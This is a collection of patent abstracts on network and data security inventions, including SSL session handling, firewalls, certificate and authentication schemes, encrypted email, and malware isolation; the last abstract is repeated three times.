Abstract: The present invention is directed towards systems and methods for managing SSL session persistence and reuse in a multi-core system. A first core may indicate that an SSL session established by the first core is non-resumable. Responsive to the indication, the core may set an indicator at a location in memory accessible by each core of the multi-core system, the indicator indicating that the SSL session is non-resumable. A second core of the multi-core system may receive a request to reuse the SSL session. The request may include a session identifier of the SSL session. In addition, the session identifier may identify the first core as an establisher of the SSL session. The second core can identify from encoding of the session identifier whether the second core is not the establisher of the SSL session. Responsive to the identification, the second core may determine whether to resume the SSL session.

Abstract: An authentication apparatus includes a first storage unit that stores proxy information containing a proxy ID and capability data, an acquiring unit that acquires the proxy information from the first storage unit, a first transmitting unit that transmits a second message containing the acquired proxy information to a terminal, a receiving unit that receives a third message and authentication data, the third message containing a first proxy ID and setting data from the terminal, and an authentication unit that performs an authentication process based on the authentication data, and a second transmitting unit that transmits the setting data to a server to which a proxy of the first proxy ID relays data communication.

Abstract: End-to-end authentication capability based on public-key certificates is combined with the Session Initiation Protocol (SIP) to allow a SIP node that receives a SIP request message to authenticate the sender of request. The SIP request message is sent with a digital signature generated with a private key of the sender and may include a certificate of the sender. The SIP request message my also be encrypted with a public key of the recipient. After receiving the SIP request, the receiving SIP node obtains a certificate of the sender and authenticates the sender based on the digital signature. The digital signature may be included in an Authorization header of the SIP request, or in a multipart message body constructed according to the S/MIME standard.

Abstract: Secure network communications between a source computer and a destination computer utilizing a firewall. The firewall determines a remote endpoint and the local physical memory address associated with a local endpoint included in the outbound request. The remote endpoint and the local physical memory address are hashed to generate an index value corresponding to an entry in an internal state table of the firewall. When an inbound request is received, the firewall determines a remote endpoint and the local physical memory address associated with a local endpoint included in the inbound request. The remote endpoint and the local physical memory address of the inbound request are hashed to generate an index value corresponding to an entry in the internal state table of the firewall. The firewall forwards the inbound request to the local endpoint if a matching entry is found in the internal state table at the index value.

Abstract: A method for transmitting messages via a time-controlled communication system (ZK) between a number of IP cores is provided. Each IP core has an information-processing subsystem (IVS) and a network controller (NK). Each NK has at least two interfaces, one for the ZK and a one for the IVS, wherein a distinction is drawn between privileged and non-privileged messages of the ZK, and where the transmission parameters relating to the ZK of a port of the NK, such as the periodically recurring transmission time of a message and the maximum transmission duration after each transmission time, can be set by a privileged message via the ZK or directly by a privileged entity. Each NK intending to transmit a message starts to transmit the message autonomously exactly at the time of the next set transmission time and interrupts the transmission process no later than the assigned maximum transmission duration has elapsed.

Abstract: A method of encrypting/decrypting the document and a safety management storage device and system method of its safety management, using for the safety management of electronic documents, the said system comprising a PC or mainframe installed with common reading software and a storage device of safety management connected to the said PC/mainframe through hot-plug; when connected to the mainframe, the said storage device is enumerated as a USB CDROM device at least. The user owns the said storage device can encrypt the electronic documents by using the encryption keys to generate an encrypted document with the same file type, also can open the encrypted document by using common reading software, and then use the document according to the predetermined operation authority.

Abstract: An aggregation machine, including: a computer, an output device controlled by the computer, and networking hardware connecting the computer to a network, the computer programmed so that the aggregation apparatus: connects to a plurality of sites on the Internet; and authenticates itself with each of the plurality of sites; and retrieves information from each of the plurality of sites; and parses the information from each of the plurality of sites; and provides user-enabled content management to users, and subject to said content management, produces an aggregation of the parsed information; and renders the aggregation as output.

Abstract: A method and apparatus for sending a self-asserted certificate is described. A mail client of a sender is configured to generate a public and private key pair, to create a self-signed certificate, and to form an introduction message addressed to a recipient to enable use of the self-signed certificate prior to corresponding with the recipient. A mail client of a recipient is configured to display an indicator of a receipt of the introduction message from the sender. The indicator comprises a user interface query to the recipient to verify and accept the sender-signed certificate in response to receiving the introduction message from the sender.

Abstract: An image processing device communicable with an information processing device, includes: a first management unit for managing at least one service provided by the image processing device based on a first protocol; a second management unit for managing the at least one service provided by the image processing device based on a second protocol; a reception unit for receiving a search request for searching for a service managed by the second management unit, the search request being transmitted from the information processing device based on the first protocol; and a transmission unit for transmitting, in response to the search request received by the reception unit, an address of a service satisfying the search request and managed by the second management unit to the information processing device.

Abstract: A device for communicating with other devices to allow them to access applications, comprises: at least a first application; authentication means for authenticating a communicating device; and access control means accessible by a communicating device requesting access to the first application without the communicating device having been authenticated by the authentication means. The device is further arranged to arbitrate whether access of the communicating device to the first application is granted or refused wherein if the arbitration requires an authentication of the communicating device, the access control means instructs the authentication means to authenticate the communicating device.

Abstract: Under the present invention, when an application is deployed, certain information corresponding thereto will be stored in an Enterprise Application Directory (EAD). Thereafter, when an instance of the application is requested (e.g., by a requestor), the information is retrieved from the EAD. In addition, the instance is registered with an Application Access Registry (AAR). Registering the instance involves creating a record in the AAR, generating a unique application access key for the instance, and storing the access key with the information in the record. The access key (and optionally the information) is then returned to the requestor, which can then issue service requests to one or more grid services in the shared computer infrastructure. The service request will include the access key so that the grid service can identify the application by searching for the record in the registry using the access key.

Abstract: An embodiment may include circuitry to generate, at least in part, and/or receive, at least in part, a packet. The packet may include at least one field and an encrypted payload. The at least one field may include, at least in part, a first key and/or at least one value. The first key and at least one value, as included in the at least one field, may be encrypted by a second key. The encrypted payload may be capable of being decrypted, at least in part, based, at least in part, upon the first key and/or the at least one value to yield an unencrypted payload. The unencrypted payload may include at least a portion of application layer data that is to be communicated in a secure session.

Abstract: Systems and methods for securely providing email messages are provided. A workstation computer is provided that includes a memory for storing computer executable instructions and a processor for accessing the memory and for executing the computer executable instructions. The computer executable instructions includes an email client configured to process email messages, at least one email message having an executable decryption attachment that includes encrypted embedded content that can only be decrypted with a unique cryptography key. The executable decryption attachment, when executed, is configured to establish a secure connection with an encryption server, receive the unique cryptography key from the encryption server and decrypt the embedded content.

Abstract: A method of processing a user interface component is provided and includes receiving one or more user interface components that can be communicated to a wireless device. A component risk level for each of the one or more user interface components is determined and assigned to each of the one or more user interface components. Each of the one or more user interface components can be digitally signed using an embedded risk code that indicates the assigned risk level. Further, the component risk level can be selected from a plurality of component risk levels. In a particular embodiment, the component risk level can be determined based on the type of the user interface component. Further, the component risk level can be determined based on a developer of the user interface component.

Abstract: A system and method for real-time network communications provides a session identifier as a public key for group communication between clients, and provides a channel identifier representing a private key for each of a plurality of clients. The channel identifier includes client-specific attributes, which function to indicate grouping criteria for the group communication. A dynamic communication link is created over a network between a client and a service based upon the public and private key combination such that group communication is enabled based upon the attributes of the private key and the public key. Communications are translated using a translation service which employs the attributes associated with the private key and the public key combination to provide response information in a designated language to enable multi-lingual real-time communications.

Abstract: Generally speaking, systems, methods and media for implementing a firewall control system responsive to process interrogations are disclosed. Embodiments of a method may include receiving a data request at a firewall where the data request is associated with a program and determining whether a process rule exists for the associated program, where the process rule includes a condition to be satisfied for a process of the user computer system. Embodiments may also include, in response to determining that a process rule does exist, determining a method for evaluating a status of the process and determining a current status of the process. Embodiments may also include determining whether the process rule is satisfied based on the current status of the process and using the determined evaluation method. Embodiments may also include, in response to determining whether the condition of the process rule is satisfied, performing one or more firewall actions.

Abstract: Generally speaking, systems, methods and media for implementing a firewall control system responsive to user authentications are disclosed. Embodiments of a method may include receiving a data request at a firewall where the data request is associated with a program. Embodiments may include determining whether an authentication plan is required to be matched for the associated program and, if so, accessing a stored authentication plan associated with the program and having one or more authentication records each having expected information relating to user access to a particular server. Embodiments may include accessing a current authentication plan from an authentication store, the current authentication plan having one or more authentication records each having information relating to user access to a particular server.

Abstract: A method for securing a program against attacks by error, i.e. in a chip card, wherein at least one jump instruction, including a relative address chosen from a plurality of possible relative addresses, is identified in the program, wherein the at least one jump instruction makes it possible to reach a targeted address inside the memory area extending before and after the jump instruction and regrouping the plurality of possible relative addresses, inside the memory area, wherein an instruction to be preserved is identified and, in order to secure at least the instruction, at least one first non-operative batch including at least one instruction is inserted, the insertion being carried out in such a way as to ensure that the insertion is compatible with maintenance of the address targeted by the jump instruction inside the memory area and that the insertion is compatible with the normal running of the program.

Abstract: An automatic patch deployment system is provided that deploys a patch according to an assessed risk and a policy. The policy may specify actions to be taken to deploy the patch for different categories of risk. The automatic patch deployment system receives a patch notification, an assessment of the risk, and the policy and deploys the patch accordingly. For example, installation of a patch may be indefinitely delayed for high risk patches, rescheduled for medium risk patches, or installed immediately for low risk patches.

Abstract: Parties involved in a transaction in an E-marketplace identify characteristics of a transaction that they are willing to accept and/or that they can provide. To do this, an attribute certificate is created for each party that contains the attributes of a buyer, seller, or third-party participant who will be transacting business in the particular E-marketplace. The attributes pertain to specifics of the transaction. The party submitting the attribute also identifies alternative conditions which, if they exist would be acceptable for conducting the transaction. Once these criteria, in the form of the attribute certificates, are received by the E-marketplace, the E-marketplace verifies the attributes. A server in the E-marketplace is configured to determine various combinations of participants that can match the deal criteria. In this manner, the E-marketplace “choreographs” the transaction to meet the needs of all.

Abstract: A first information processing apparatus encrypts data that it receives from a second information processing apparatus, and transmits the data thus encrypted to an external device. The second information processing apparatus transmits the data to the first information processing apparatus according to a data size that results after a data size being necessary for communication of the encrypted data is subtracted from a specified data size.

Abstract: Methods and systems for communicating information between computer networks in which the information to be communicated is required at one location (e.g. for processing) but only available at another location. The information may be absent deliberately (for privacy reasons) or may simply be unavailable as an artifact of the computer network(s) involved. The required information, such as the internal client IP address, is inserted into the outgoing network communication in a manner that does not to materially affect the normal transit or utility of the network communication (e.g. as custom headers). The information is preferably inserted in an encrypted form, so that it may pass over a public network and be invulnerable to unauthorised scrutiny.

Abstract: A method and apparatus for providing layer-independent secure network communication is provided. According to an embodiment of the invention, a transmission medium is provided between a first network node and a second network node. Both the first network node and the second network node support at least one common communication protocol. A Java output stream is established between a first process executing on the first network node and the transmission medium. Also, a Java input stream is established between a second process executing on the second multi-layered node and the transmission medium. Data to be transmitted from the first process to the second process is encrypted by the first process and written to the Java output stream. The data is transmitted to the second network node. Then the data is read from the Java input stream by the second process and decrypted.

Abstract: Recommending a security policy to a firewall, includes receiving a request from a firewall for a recommendation as to whether the firewall should allow or block a detected present communication for which the firewall does not have an existing security policy. Information about past blocked and allowed communications at other firewalls on a network is searched to identify past communications that are similar to the present communication. The identified past communications are assigned a respective positive or negative vote. A positive vote indicates a past communication was allowed and a negative vote indicates a past communication was not allowed. A positive recommendation is sent to the requesting firewall to allow the present communication if the positive votes outnumber the negative votes, and a negative recommendation is sent to the requesting firewall to block the present communication if the negative votes outnumber the positive votes.

Abstract: By arranging a redundancy means and a control means upstream from an encryption means which encrypts and decrypts the data to be stored in an external memory, the integrity of data may be ensured when the generation of redundancy information is realized by the redundancy means, and when the generation of a syndrome bit vector indicating any alteration of the data is implemented by the control means. What is preferred is a control matrix constructed from idempotent, thinly populated, circulant square sub-matrices only. By arranging redundancy and control means upstream from the encryption/decryption means, what is achieved is that both errors in the encrypted data and errors of the non-encrypted data may be proven, provided that they have occurred in the data path between the redundancy/control means and the encryption/decryption means.

Abstract: A communication apparatus used in a plurality of networks is disclosed. The communication apparatus includes a firewall which allows communication with outside of the communication apparatus when disabled, and prohibits communication with outside of the communication apparatus when enabled. Then, the communication apparatus includes a firewall control unit which acquires a first MAC address of a first default gateway provided for a predetermined specific network and a second MAC address of a second default gateway provided for a network in which the communication apparatus is being connected, and controls the firewall according to a result of comparison of the first MAC address and the second MAC address.

Abstract: It is an object of the present invention to provide an information processing device and a memory management method that enable execution of memory management processing for simultaneously starting up two types of applications. During execution of an application in the form of a Java application, the application starts up another an application in the form of Flash data, and then a native software in the form of a Flash Player causes a memory management unit to secures a prescribed memory area from a memory area for the native software. A native software then starts up the other application using the secured memory area.

Abstract: A method for enabling efficient SSL handshakes through precomputing of handshake messages, the method includes: receiving, by an appliance, a server certificate identifying a server; generating, by the appliance, at least one of: (i) an SSL server certificate message comprising the received server certificate, (ii) an SSL client certificate request message, and (iii) an SSL hello done message; storing, by the appliance, the generated messages; receiving, by the appliance from a client, an SSL client hello message identifying the server; and transmitting, by the appliance to the client, an SSL server hello message and at least one of the stored messages. Corresponding systems are also described.

Abstract: Methods, software, and hardware are disclosed for providing verified real time price quotes in an over-the-counter financial market. Systems are described that can comprise methods, software, and/or hardware to provide verified real time price information for securities traded over-the-counter. Verification methods of the invention include identifying suspect source data, wherein the suspect source data includes information about the price of a security, verifying the suspect source data, and displaying to a user a verified price quote of a security traded in an over-the-counter market to a user. The verification methods of the invention include using hash functions and hash tables to process suspect source data, wherein the hashing allows for confidential processing while at the same time maintaining the ability to match a price quote to the source of the price quote.

Abstract: An printing apparatus capable of maintaining confidentiality of a printed matter more reliably. Where a confidential print command is received, when user identification information for a user who issued the confidential print command is read from a recording medium such as an IC card by a reader, the printing apparatus puts the execution of the print processing pertaining to the confidential print command on hold if print processing based on a command issued by a user other than the user who issued the confidential print command via operation of an operation unit is being executed, and it begins the execution of the print processing pertaining to the confidential print command if print processing based on a command issued by a user other than the user who issued said confidential print command via operation of the operation unit is not being executed.

Abstract: A method for frustrating unauthorized access to an electronic mail message having address, body and attachment information and being transmitted from a first computer to a second computer, including: at the first computer: detecting a request to send the message; encrypting the extracted body information; replacing the extracted body information with the encrypted body information; extracting the attachment information; encrypting the extracted attachment information; replacing the extracted attachment information with the encrypted attachment information; returning the message having the encrypted body and attachment information to the mail user application; and transmitting the message having the encrypted body and attachment information to a third computer; and, at the third computer: decrypting and re-encrypting the transmitted body information; decrypting and re-encrypting the transmitted attachment information; and, transmitting the re-encrypted body and attachment information to the second computer.

Abstract: A secure communication system that includes a communication processor, an internet protocol converter that converts data to and from its original protocol to internet protocol, an encryptor/decryptor to provide additional security for communications that are routed through the secure communication system, and a cryptography module and other logic that identifies the security classification of data and verifies the cryptographic keys of the source, in the communication, and of the destination. An additional security processor may be provided as required by secure communication standards. The secure communication system may also include an a internet router that routes the data through the secure communication system. The communication processor provides real-time control and can change a source or destination, an encryption key, a security level, the protocol of a communication in response to sensor data received from a communicating entity or from command signals from a connected or remote control system.

Abstract: A management server acts as a repository for a plurality of user certificates corresponding to a plurality of users. When a user wishes to access a remote computer such as a secure-enabled host requiring a secure credential, his/her computer sends a request message to the management server. The management server may perform its own validity checking. In response to a request and conditioned on the management server authorizing access to a computing resource that requires an authorization credential, the management server delivers the requested credential and executable code, the authorization credential comprising information that enables access to the computing resource and the delivered executable code manages the lifecycle of the delivered authorization credential by allowing only temporary storage without caching of the delivered authorization credential.

Abstract: Validating a certificate is disclosed. Whether the certificate was previously determined to be valid by one or more peer entities is determined. The certificate is validated based at least in part on the determination.

Abstract: A system and method for implementing security of multi-party communication is disclosed in the disclosure. The system mainly includes a group key management unit and a record protocol unit. The method mainly includes when the system runs in the centralized group key management mode, the Group Controller and Key Server (GCKS) establishes and stores a Group Security Association, the GCKS negotiates with the group members to establish an Initiation Security Association, under the protection of the Initiation Security Association, the group members obtain the Group Security Association from GCKS. When the system runs in the distributed group key management mode, a Group Security Association is established by all the group members together at the beginning of the group communication.

Abstract: Uniform resource locator (URL) patterns are found in browsing histories of client computers. The URL patterns are employed to find URL browsing chains for particular client computers. A URL browsing chain includes URL requests that match URL patterns arranged in sequential order by time stamp. The URL browsing chains may be normalized and then evaluated for web threat infection chains. URL browsing chains that are deemed to be web threat infection chains are built into a model. The model may be deployed locally in a client computer or in a remotely located server computer to detect web threat infection chains.

Abstract: A computer-implemented method for preventing threats originating from a non-process based component hosted by a trusted process is described. The loading activity of the trusted process is monitored. A trust level associated with the trusted process is altered when an unverified component is loaded into the trusted process. Events performed by the trusted process are monitored. An unverified component that originated the event is identified. The trusted process is terminated based on a security risk associated with the unverified component that originated the event.

Abstract: A method, apparatus, and system are directed toward managing a Transmission Control Protocol/Internet Protocol (TCP/IP) handshake. A SYN-ACK cookie is determined based on a cryptographic operation using a secret key and at least one network characteristic. The SYN-ACK cookie is provided in a SYN message's field. The SYN message is sent from a client to a server. Another sequence number based on the received SYN-ACK cookie is included in a SYN-ACK message. The SYN-ACK message is sent to and received by the client. The other sequence number is validated based on the secret key to generate at least another network characteristic. A TCP/IP connection is established if the network characteristic matches the other network characteristic. In one embodiment, the component sending the SYN message may be a different component than the component receiving the SYN-ACK message. In this embodiment, the secret key may be shared between the two components.

Abstract: The invention relates to a method for evaluating or accessing a network address, comprising the steps of: receiving a network address (50); generating derivatives (60) of the received network address (50); assigning a trust level to the generated derivatives (60) and the received network address (50); comparing the trust levels of the derivatives (60) with the trust level of the received network address (50); and issuing a response based on the comparison.

Abstract: Computer-readable medium having a data structure stored thereon for defining a schema for expressing a network security policy. The data structure includes a first data field including data defining a parameter to be applied based on the network security policy. The network security policy defines at least one of the following: a firewall rule and a connection security rule. The data structure also includes a second data field having data specifying restrictions of the parameter included in the first data field. The parameter in the first data field and the restrictions in the second data field form the schema for expressing the network security policy to be processed. The network security policy manages communications between a computing device and at least one other computing device.

Abstract: Embodiments provide an application layer security proxy that protects substation automation systems. The application layer security proxy inspects a received, inbound data packet at the application layer, and either drops the data packet, forwards the data packet, or processes the data packet rather than dropping it in order to maintain the communications network connection, the later two according to a predefined role-based access control policy. The application layer security proxy calculates a round trip time for each reply to a received, inbound data packet and observes the bandwidth usage from the amount of bytes transmitted. Round trip time and bandwidth usage are used to detect abnormal communication traffic.

Abstract: A server interacts with a sender to form a package which can include one or more attached data files to be sent to one or more recipients, and the server applies a policy established by a policy authority of the sender to the package. Since the sever both forms the package through interaction with the sender and applies the policy, any violations of the policy by the package can be brought to the sender's attention during an interactive session with the sender and before encryption of all or part of the package. As a result, the sender is educated regarding the policy of the sender's policy authority, and the sender can modify the package immediately to comport with the policy. The server delivers the package to the one or more intended recipients by sending notification to each recipient and including in such notification package identification data, e.g., a URL by which the package can be retrieved.

Abstract: A system and method for handling secure-format messages includes a message server that receives secure-format messages from senders and operates in conjunction with a secure message handler to detect and prevent the delivery of invalid secure-format messages. When a secure-format message is determined to be invalid, the secure message handler may take one or more of the following actions: replace the body of the invalid message with a template message, send a message to the sender of the invalid message indicating the message was rejected, delete the invalid message from the recipient's mailbox, or log the message on the message server and mark it for review. Additionally, the handling of invalid messages is configurable. In particular, the actions to take and the conditions under which those actions are to be taken may be specified by an administrator.

Abstract: A method and apparatus for providing securing a connection with a (Secure Sockets Layer) SSL/TLS-enabled server. In one embodiment, a web client establishes a new connection by initiating a communication with the SSL/TLS-enabled server. The communication includes a non-POST request. After the client negotiates the secured connection with the server in response to the non-POST request, the client submits a POST request to the SSL/TLS-enabled server via the secured connection.

Abstract: Provided are methods, apparatus and computer programs for tracking the origins of data and controlling transmission of the data. In one embodiment, transmission of sensitive data by script operations is limited, to prevent transmission to any network location other than to the source of that sensitive data, by a new function within a scripting engine of an HTTP client that is responsive to origin tags placed within the data. Origin tags that are associated with data inputs are propagated to any output data items, so that transmission of derived information can also be controlled.

Abstract: Disclosed are systems, methods and computer program products for reducing security risk in a computer network. The system includes an administration server that collects system usage, user profile and security incidents information from a plurality of computers in the network. The server determines values of one or more risk factors for each computer using the collected information. The server then calculates security rating of each computer user as a function of the risk factors and adjusts the calculated security rating of a given computer user based on the security ratings of other computer users with whom the given computer users communicates. The server then selects, based on the adjusted security rating, security settings for the computer of the given user in order to reduce user's security risk to the computer network and applies the selected security settings to the computer of the given user.

Abstract: A system for authenticating a request to access a protected network resource behind two security layers is disclosed. The system includes a client which contains a web browser, a first server tier, and second server tier. The first server tier is protected behind a first security layer and hosts a first software object and second software object. The first server tier is operatively coupled to the client system via a first connection wherein the first software object and second software object are configured to be in communications with the web browser. The second server tier is protected behind the first security layer and second security layer and hosts an authentication service. The second server tier is operatively coupled to the first server tier via a second connection wherein the authentication service is configured to be in communications with the second software object.

Abstract: In a computer system, a first electronic data processor is communicatively coupled to a first memory space and a second memory space. A second electronic data processor is communicatively coupled the second memory space and to a network interface device. The second electronic data processor is capable of exchanging data across a network of one or more computers via the network interface device. A video processor is adapted to combine video data from the first and second electronic data processors and transmit the combined video data to a display terminal for displaying the combined video data in a windowed format. The computer system is configured such that a malware program downloaded from the network and executing on the second electronic data processor is incapable of initiating access to the first memory space.

Abstract: In a computer system, a first electronic data processor is communicatively coupled to a first memory space and a second memory space. A second electronic data processor is communicatively coupled the second memory space and to a network interface device. The second electronic data processor is capable of exchanging data across a network of one or more computers via the network interface device. A video processor is adapted to combine video data from the first and second electronic data processors and transmit the combined video data to a display terminal for displaying the combined video data in a windowed format. The computer system is configured such that a malware program downloaded from the network and executing on the second electronic data processor is incapable of initiating access to the first memory space.

Abstract: In a computer system, a first electronic data processor is communicatively coupled to a first memory space and a second memory space. A second electronic data processor is communicatively coupled the second memory space and to a network interface device. The second electronic data processor is capable of exchanging data across a network of one or more computers via the network interface device. A video processor is adapted to combine video data from the first and second electronic data processors and transmit the combined video data to a display terminal for displaying the combined video data in a windowed format. The computer system is configured such that a malware program downloaded from the network and executing on the second electronic data processor is incapable of initiating access to the first memory space.